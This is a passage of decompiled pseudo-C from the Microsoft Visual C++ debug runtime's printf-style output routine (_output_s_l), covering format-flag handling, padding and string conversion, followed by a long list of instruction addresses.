    																					}
    																					_t618 =  *(_t701 - 0x314);
    																					 *(_t701 - 0x278) =  *(_t701 - 0x314);
    																					if( *(_t701 - 0x278) == 0) {
    																						_push( &M00B77C38);
    																						_push(0);
    																						_push(0x460);
    																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																						_push(2);
    																						_t545 = L00B7D760();
    																						_t704 = _t704 + 0x14;
    																						if(_t545 == 1) {
    																							asm("int3");
    																						}
    																					}
    																					L14:
    																					if( *(_t701 - 0x278) != 0) {
    																						goto L16;
    																					} else {
    																						 *((intOrPtr*)(L00B80C60(_t618))) = 0x16;
    																						E00B809F0(_t589, _t618, _t699, _t700,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    																						 *(_t701 - 0x2f0) = 0xffffffff;
    																						E00B7C650(_t701 - 0x40);
    																						_t518 =  *(_t701 - 0x2f0);
    																						L229:
    																						return E00B805D0(_t518, _t589,  *(_t701 - 0x48) ^ _t701, _t665, _t699, _t700);
    																					}
    																				}
    																			}
    																			L219:
    																			if( *(_t701 - 0x25c) == 0 ||  *(_t701 - 0x25c) == 7) {
    																				 *(_t701 - 0x334) = 1;
    																			} else {
    																				 *(_t701 - 0x334) = 0;
    																			}
    																			_t605 =  *(_t701 - 0x334);
    																			 *(_t701 - 0x2e0) =  *(_t701 - 0x334);
    																			if( *(_t701 - 0x2e0) == 0) {
    																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    																				_push(0);
    																				_push(0x8f5);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				_t523 = L00B7D760();
    																				_t704 = _t704 + 0x14;
    																				if(_t523 == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(_t701 - 0x2e0) != 0) {
    																				 *(_t701 - 0x300) =  *(_t701 - 0x24c);
    																				E00B7C650(_t701 - 0x40);
    																				_t518 =  *(_t701 - 0x300);
    																			} else {
    																				 *((intOrPtr*)(L00B80C60(_t605))) = 0x16;
    																				E00B809F0(_t589, _t605, _t699, _t700, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    																				 *(_t701 - 0x2fc) = 0xffffffff;
    																				E00B7C650(_t701 - 0x40);
    																				_t518 =  *(_t701 - 0x2fc);
    																			}
    																			goto L229;
    																		}
    																		L191:
    																		if(( *(_t701 - 0x10) & 0x00000040) != 0) {
    																			if(( *(_t701 - 0x10) & 0x00000100) == 0) {
    																				if(( *(_t701 - 0x10) & 0x00000001) == 0) {
    																					if(( *(_t701 - 0x10) & 0x00000002) != 0) {
    																						 *((char*)(_t701 - 0x14)) = 0x20;
    																						 *(_t701 - 0x1c) = 1;
    																					}
    																				} else {
    																					 *((char*)(_t701 - 0x14)) = 0x2b;
    																					 *(_t701 - 0x1c) = 1;
    																				}
    																			} else {
    																				 *((char*)(_t701 - 0x14)) = 0x2d;
    																				 *(_t701 - 0x1c) = 1;
    																			}
    																		}
    																		 *((intOrPtr*)(_t701 - 0x2c4)) =  *((intOrPtr*)(_t701 - 0x18)) -  *((intOrPtr*)(_t701 - 0x24)) -  *(_t701 - 0x1c);
    																		if(( *(_t701 - 0x10) & 0x0000000c) == 0) {
    																			E00B95E80(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																			_t704 = _t704 + 0x10;
    																		}
    																		E00B95EC0( *(_t701 - 0x1c), _t701 - 0x14,  *(_t701 - 0x1c),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																		_t704 = _t704 + 0x10;
    																		if(( *(_t701 - 0x10) & 0x00000008) != 0 && ( *(_t701 - 0x10) & 0x00000004) == 0) {
    																			E00B95E80(0x30,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																			_t704 = _t704 + 0x10;
    																		}
    																		if( *(_t701 - 0xc) == 0 ||  *((intOrPtr*)(_t701 - 0x24)) <= 0) {
    																			L212:
    																			E00B95EC0( *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 0x24)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																			_t704 = _t704 + 0x10;
    																			goto L213;
    																		} else {
    																			L205:
    																			 *(_t701 - 0x2dc) = 0;
    																			 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 4));
    																			 *((intOrPtr*)(_t701 - 0x2cc)) =  *((intOrPtr*)(_t701 - 0x24));
    																			while(1) {
    																				L206:
    																				 *((intOrPtr*)(_t701 - 0x2cc)) =  *((intOrPtr*)(_t701 - 0x2cc)) - 1;
    																				if( *((intOrPtr*)(_t701 - 0x2cc)) == 0) {
    																					break;
    																				}
    																				L207:
    																				 *(_t701 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t701 - 0x2c8))));
    																				_t563 = E00B97890(_t701 - 0x2d0, _t701 - 0x2d8, 6,  *(_t701 - 0x32e) & 0x0000ffff);
    																				_t704 = _t704 + 0x10;
    																				 *(_t701 - 0x2dc) = _t563;
    																				 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 0x2c8)) + 2;
    																				if( *(_t701 - 0x2dc) != 0 ||  *((intOrPtr*)(_t701 - 0x2d0)) == 0) {
    																					L209:
    																					 *(_t701 - 0x24c) = 0xffffffff;
    																					break;
    																				} else {
    																					L210:
    																					E00B95EC0( *((intOrPtr*)(_t701 + 8)), _t701 - 0x2d8,  *((intOrPtr*)(_t701 - 0x2d0)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																					_t704 = _t704 + 0x10;
    																					continue;
    																				}
    																			}
    																			L211:
    																			L213:
    																			if( *(_t701 - 0x24c) >= 0 && ( *(_t701 - 0x10) & 0x00000004) != 0) {
    																				E00B95E80(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																				_t704 = _t704 + 0x10;
    																			}
    																			goto L216;
    																		}
    																		L71:
    																		__ecx =  *((char*)(__ebp - 0x251));
    																		 *(__ebp - 0x324) = __ecx;
    																		__edx =  *(__ebp - 0x324);
    																		__edx =  *(__ebp - 0x324) - 0x41;
    																		 *(__ebp - 0x324) = __edx;
    																	} while ( *(__ebp - 0x324) > 0x37);
    																	_t158 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    																	__ecx =  *_t158 & 0x000000ff;
    																	switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    																		case 0:
    																			L123:
    																			 *(__ebp - 0x2c) = 1;
    																			__ecx =  *((char*)(__ebp - 0x251));
    																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    																			 *((char*)(__ebp - 0x251)) = __cl;
    																			goto L124;
    																		case 1:
    																			L73:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																			}
    																			goto L75;
    																		case 2:
    																			L88:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																			}
    																			goto L90;
    																		case 3:
    																			L146:
    																			 *((intOrPtr*)(__ebp - 0x260)) = 7;
    																			goto L148;
    																		case 4:
    																			L81:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x288) = E00B93D50(__ebp + 0x14);
    																			if( *(__ebp - 0x288) == 0) {
    																				L83:
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				L87:
    																				goto L190;
    																			}
    																			L82:
    																			__ecx =  *(__ebp - 0x288);
    																			if( *((intOrPtr*)( *(__ebp - 0x288) + 4)) != 0) {
    																				L84:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																					 *(__ebp - 0xc) = 0;
    																					__edx =  *(__ebp - 0x288);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x288);
    																					__edx =  *__ecx;
    																					 *(__ebp - 0x24) =  *__ecx;
    																				} else {
    																					__edx =  *(__ebp - 0x288);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x288);
    																					__eax =  *__ecx;
    																					asm("cdq");
    																					 *__ecx - __edx =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0xc) = 1;
    																				}
    																				goto L87;
    																			}
    																			goto L83;
    																		case 5:
    																			L124:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			__eax = __ebp - 0x248;
    																			 *(__ebp - 4) = __ebp - 0x248;
    																			 *(__ebp - 0x44) = 0x200;
    																			if( *(__ebp - 0x30) >= 0) {
    																				L126:
    																				if( *(__ebp - 0x30) != 0) {
    																					L129:
    																					if( *(__ebp - 0x30) > 0x200) {
    																						 *(__ebp - 0x30) = 0x200;
    																					}
    																					L131:
    																					if( *(__ebp - 0x30) > 0xa3) {
    																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																						if( *(__ebp - 0x20) == 0) {
    																							 *(__ebp - 0x30) = 0xa3;
    																						} else {
    																							__eax =  *(__ebp - 0x20);
    																							 *(__ebp - 4) =  *(__ebp - 0x20);
    																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																						}
    																					}
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					__eax =  *(__ebp + 0x14);
    																					__ecx =  *(__eax - 8);
    																					__edx =  *(__eax - 4);
    																					 *(__ebp - 0x2a8) =  *(__eax - 8);
    																					 *(__ebp - 0x2a4) =  *(__eax - 4);
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__eax =  *(__ebp - 0x2c);
    																					_push( *(__ebp - 0x2c));
    																					__ecx =  *(__ebp - 0x30);
    																					_push( *(__ebp - 0x30));
    																					__edx =  *((char*)(__ebp - 0x251));
    																					_push( *((char*)(__ebp - 0x251)));
    																					__eax =  *(__ebp - 0x44);
    																					_push( *(__ebp - 0x44));
    																					__ecx =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__edx = __ebp - 0x2a8;
    																					_push(__ebp - 0x2a8);
    																					__eax =  *0xd12188; // 0xddc09d6c
    																					__eax =  *__eax();
    																					__esp = __esp + 0x1c;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__edx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__eax =  *0xd12194; // 0xddc09d6c
    																						__eax =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																					__ecx =  *((char*)(__ebp - 0x251));
    																					if( *((char*)(__ebp - 0x251)) == 0x67) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__eax =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__ecx =  *0xd12190; // 0xddc09d6c
    																							E00B849C0(__ecx) =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__edx =  *(__ebp - 4);
    																					__eax =  *( *(__ebp - 4));
    																					if( *( *(__ebp - 4)) == 0x2d) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																					}
    																					__eax =  *(__ebp - 4);
    																					 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																					goto L190;
    																				}
    																				L127:
    																				__ecx =  *((char*)(__ebp - 0x251));
    																				if(__ecx != 0x67) {
    																					goto L129;
    																				}
    																				L128:
    																				 *(__ebp - 0x30) = 1;
    																				goto L131;
    																			}
    																			L125:
    																			 *(__ebp - 0x30) = 6;
    																			goto L131;
    																		case 6:
    																			L75:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																				__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																				 *(__ebp - 0x284) = __ax;
    																				__cl =  *(__ebp - 0x284);
    																				 *(__ebp - 0x248) = __cl;
    																				 *(__ebp - 0x24) = 1;
    																			} else {
    																				 *(__ebp - 0x280) = 0;
    																				__edx = __ebp + 0x14;
    																				__eax = E00B93D90(__ebp + 0x14);
    																				 *(__ebp - 0x258) = __ax;
    																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
    																				__ecx = __ebp - 0x248;
    																				__edx = __ebp - 0x24;
    																				 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    																				if( *(__ebp - 0x280) != 0) {
    																					 *(__ebp - 0x28) = 1;
    																				}
    																			}
    																			__edx = __ebp - 0x248;
    																			 *(__ebp - 4) = __ebp - 0x248;
    																			goto L190;
    																		case 7:
    																			goto L0;
    																		case 8:
    																			L109:
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 0x298) = E00B93D50(__ebp + 0x14);
    																			if(E00B97280() != 0) {
    																				L119:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																					__edx =  *(__ebp - 0x298);
    																					__eax =  *(__ebp - 0x24c);
    																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																				} else {
    																					__eax =  *(__ebp - 0x298);
    																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																				}
    																				 *(__ebp - 0x28) = 1;
    																				goto L190;
    																			}
    																			L110:
    																			__edx = 0;
    																			if(0 == 0) {
    																				 *(__ebp - 0x32c) = 0;
    																			} else {
    																				 *(__ebp - 0x32c) = 1;
    																			}
    																			__eax =  *(__ebp - 0x32c);
    																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    																			if( *(__ebp - 0x29c) == 0) {
    																				_push(L"(\"\'n\' format specifier disabled\", 0)");
    																				_push(0);
    																				_push(0x695);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				__eax = L00B7D760();
    																				__esp = __esp + 0x14;
    																				if(__eax == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(__ebp - 0x29c) != 0) {
    																				L118:
    																				goto L190;
    																			} else {
    																				L117:
    																				 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																				__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																				 *(__ebp - 0x2f8) = 0xffffffff;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C650(__ecx);
    																				__eax =  *(__ebp - 0x2f8);
    																				goto L229;
    																			}
    																		case 9:
    																			L151:
    																			 *(__ebp - 8) = 8;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																			}
    																			goto L153;
    																		case 0xa:
    																			L145:
    																			 *(__ebp - 0x30) = 8;
    																			goto L146;
    																		case 0xb:
    																			L90:
    																			if( *(__ebp - 0x30) != 0xffffffff) {
    																				__edx =  *(__ebp - 0x30);
    																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
    																			} else {
    																				 *(__ebp - 0x328) = 0x7fffffff;
    																			}
    																			__eax =  *(__ebp - 0x328);
    																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																				L101:
    																				if( *(__ebp - 4) == 0) {
    																					__edx =  *0xd121a0; // 0xb775a0
    																					 *(__ebp - 4) = __edx;
    																				}
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x28c) =  *(__ebp - 4);
    																				while(1) {
    																					L104:
    																					__ecx =  *(__ebp - 0x290);
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					if(__ecx == 0) {
    																						break;
    																					}
    																					L105:
    																					__eax =  *(__ebp - 0x28c);
    																					__ecx =  *( *(__ebp - 0x28c));
    																					if(__ecx == 0) {
    																						break;
    																					}
    																					L106:
    																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																				}
    																				L107:
    																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) -  *(__ebp - 4);
    																				 *(__ebp - 0x24) =  *(__ebp - 0x28c) -  *(__ebp - 4);
    																				goto L108;
    																			} else {
    																				L94:
    																				if( *(__ebp - 4) == 0) {
    																					__eax =  *0xd121a4; // 0xb77590
    																					 *(__ebp - 4) = __eax;
    																				}
    																				 *(__ebp - 0xc) = 1;
    																				__ecx =  *(__ebp - 4);
    																				 *(__ebp - 0x294) =  *(__ebp - 4);
    																				while(1) {
    																					L97:
    																					__edx =  *(__ebp - 0x290);
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																					if( *(__ebp - 0x290) == 0) {
    																						break;
    																					}
    																					L98:
    																					__ecx =  *(__ebp - 0x294);
    																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																						break;
    																					}
    																					L99:
    																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																				}
    																				L100:
    																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    																				 *(__ebp - 0x24) = __ecx;
    																				L108:
    																				goto L190;
    																			}
    																		case 0xc:
    																			L144:
    																			 *(__ebp - 8) = 0xa;
    																			goto L153;
    																		case 0xd:
    																			L147:
    																			 *((intOrPtr*)(__ebp - 0x260)) = 0x27;
    																			L148:
    																			 *(__ebp - 8) = 0x10;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				 *((char*)(__ebp - 0x14)) = 0x30;
    																				 *((intOrPtr*)(__ebp - 0x260)) =  *((intOrPtr*)(__ebp - 0x260)) + 0x51;
    																				 *((char*)(__ebp - 0x13)) = __al;
    																				 *(__ebp - 0x1c) = 2;
    																			}
    																			goto L153;
    																		case 0xe:
    																			goto L190;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}



























    0x00b956e9
    0x00b956e9
    0x00b956e9
    0x00b956e9
    0x00b956ef
    0x00b956f2
    0x00000000
    0x00b9576a
    0x00000000
    0x00b9576a
    0x00000000
    0x00b9576a
    0x00b9576a
    0x00b95772
    0x00b95794
    0x00b9579a
    0x00b957bf
    0x00b95806
    0x00b95809
    0x00b9582a
    0x00b9582f
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580f
    0x00b95814
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c7
    0x00b957e9
    0x00b957ee
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957cd
    0x00b957d2
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b957a0
    0x00b957a5
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95778
    0x00b9577d
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95846
    0x00b95888
    0x00b9588e
    0x00b9589a
    0x00000000
    0x00b95848
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00b9585c
    0x00b9585c
    0x00b9586a
    0x00b9586f
    0x00b95875
    0x00b95883
    0x00b958a0
    0x00b958a8
    0x00b958ca
    0x00b958ca
    0x00b958d4
    0x00b958e5
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b95921
    0x00000000
    0x00000000
    0x00b95931
    0x00b95934
    0x00b9593e
    0x00b9594d
    0x00b95956
    0x00b9596c
    0x00b95972
    0x00b9597f
    0x00b9598d
    0x00b9598d
    0x00b9599c
    0x00b959a4
    0x00b959a4
    0x00b959ac
    0x00b959b2
    0x00b959bb
    0x00b959c7
    0x00b959e0
    0x00b959e6
    0x00b959ef
    0x00b959ef
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bee
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b9503a
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517e
    0x00b95182
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95125
    0x00000000
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f4
    0x00000000
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c0f
    0x00b95c0f
    0x00b95c0f
    0x00b95c25
    0x00b95c2b
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b959fc
    0x00b95a02
    0x00b95a0c
